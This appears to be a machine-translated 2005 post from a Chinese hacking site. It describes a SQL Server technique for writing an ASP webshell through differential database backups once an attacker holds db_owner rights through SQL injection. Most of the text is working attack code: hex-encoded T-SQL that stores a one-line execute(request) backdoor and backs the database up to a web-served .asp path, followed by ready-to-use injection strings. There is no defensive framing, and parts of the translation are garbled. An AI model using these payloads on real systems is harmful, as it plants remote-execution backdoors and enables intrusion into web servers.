db_owner permissions to give the webshell two point improvement - - the vulnerability warning-the black bar safety net

2005-10-01T00:00:00
ID MYHACK58:6220052872
Type myhack58
Reporter 佚名
Modified 2005-10-01T00:00:00

Description

| the db_owner permissions to give the webshell two point improvement | ---|--- Reduce backup file size, the resulting executable webshell success rate improved a lot The use of a differential backup Adding a parameter WITH DIFFERENTIAL declare @a sysname,@s nvarchar(4 0 0 0) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006b00 backup database @a to disk=@s

create table [dbo]. [xiaolu] ([cmd] [image]);

insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253e)

declare @a sysname,@s nvarchar(4 0 0 0) select @a=db_name(),@s=0x65003A005C007700650062005C0077006f006b0061006f002e00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL

II use full FORMAT Adding a parameter WITH FROMAT Some pages of the database to be executed several times, and the backup and the default is always to append mode, if an injection point of the database a couple of times of the operation, and the backup file is several times the increase, so declare @a sysname,@s nvarchar(4 0 0 0) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006b00 backup database @a to disk=@s

create table [dbo]. [xiaolu] ([cmd] [image]);

insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253e)

declare @a sysname,@s nvarchar(4 0 0 0) select @a=db_name(),@s=0x65003A005C007700650062005C0077006f006b0061006f002e00610073007000 backup database @a to disk=@s WITH FORMAT

In General that is so simple a few words,the following to backup the database model as an example 1 id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%2 5>') 2 id=1;backup database model to disk='your path' with differential,format;--